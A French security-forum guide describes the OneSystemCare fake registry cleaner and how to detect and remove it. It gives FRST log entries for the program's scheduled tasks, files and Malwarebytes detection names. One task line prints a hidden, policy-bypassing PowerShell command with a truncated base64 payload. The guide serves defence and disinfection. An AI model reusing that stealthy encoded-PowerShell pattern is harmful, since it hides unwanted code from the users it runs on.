OneSystemCare est un
faux nettoyeur/optimiseur de registre, affiche intentionnellement des faux-positifs pour convaincre l'utilisateur que son système a des problèmes et lui faire acheter le logiciel.
Plus d'infos :
Registry Cleaners: Digital Snake Oil | Malwarebytes Labs- S'installe en tant que programme, à l'insu de l'utilisateur ou parce qu'il n'a pas décoché les sponsors proposés lors de l'installation d'un logiciel gratuit légitime
- Affiche ces alertes pendant l'installation
- Affiche ces fenêtres pendant l'opération
- Crée cette icône dans la Barre des tâches et sur le Bureau
- Crée ces tâches planifiées
**********Détection de
OneSystemCare dans des rapports
FRST :
One System Care (HKLM-x32\...\OneSystemCare) (Version: 4.4.0.3 - OneSystemCare) <==== ATTENTION
Task: {11FD0FCC-787D-4FF1-B466-D5659CEA6633} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [2016-12-26] () <==== ATTENTION
Task: {4D89F1C3-36A8-4429-8FC1-0B263DA7E332} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2016-12-26] () <==== ATTENTION
Task: {668D20B7-A868-4B90-AF03-489B802C5E0A} - System32\Tasks\One System Care Run Delay => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [2016-12-26] () <==== ATTENTION
Task: {6CAB0476-77E0-4D8A-9D0A-D4FC8118D982} - System32\Tasks\{057E7947-780B-0E0B-7D11-0E0D0B0C110F} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgADsAIAA7ADsAOwA7ADsAIAAgACAAIAA7ACAAIAA7ADsAIAAgACAAIAA7ACAAIAA7ACAAIAAgADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA (the data entry has 10184 more characters).
Task: {F04F6E92-DB17-4ED4-8BB7-2F698ABDAD9E} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2016-12-26] () <==== ATTENTION
Task: C:\Windows\Tasks\One System CarePeriod.job => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION
() C:\Program Files (x86)\OneSystemCare\SystemConsole.exe
() C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe
C:\Windows\System32\Tasks\{057E7947-780B-0E0B-7D11-0E0D0B0C110F}
C:\Windows\System32\Tasks\One System Care Task
C:\Windows\System32\Tasks\One System Care Run Delay
C:\Windows\System32\Tasks\One System Care Monitor
C:\Windows\System32\Tasks\One System CarePeriod
C:\Windows\Tasks\One System CarePeriod.job
C:\ProgramData\2a2276f9-20a1-1
C:\ProgramData\2a2276f9-0b93-0
C:\Users\{Nom_Uilisateur}\AppData\Roaming\One System Care
C:\Program Files (x86)\OneSystemCare
C:\Users\Public\Desktop\Launch One System Care.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
**********Détecté et traité par
Malwarebytes en tant que PUP/LPI (Programme potentiellement Indésirable) et Adware
Sous la version Premium,
Malwarebytes bloque le domaine vd.onesystemhost.net et l'IP 104.24.118.133
Adware.OptimizerEliteMax
PUP.Optional.OneSystemCare
PUP.Optional.DNSUnlocker.ACMB2
Tutoriel d'utilisation Malwarebytes en imagesSource : Removal instructions for OneSystemCare de Metallica - Malwarebytes Forums
Toujours infecté ? Une question avant de faire des manipulations ?
Venez poster un
nouveau sujet dans ce forum :
http://forum.security-x.fr/desinfections/ en prenant soin de suivre la procédure
http://forum.security-x.fr/desinfections/procedure-preliminaire/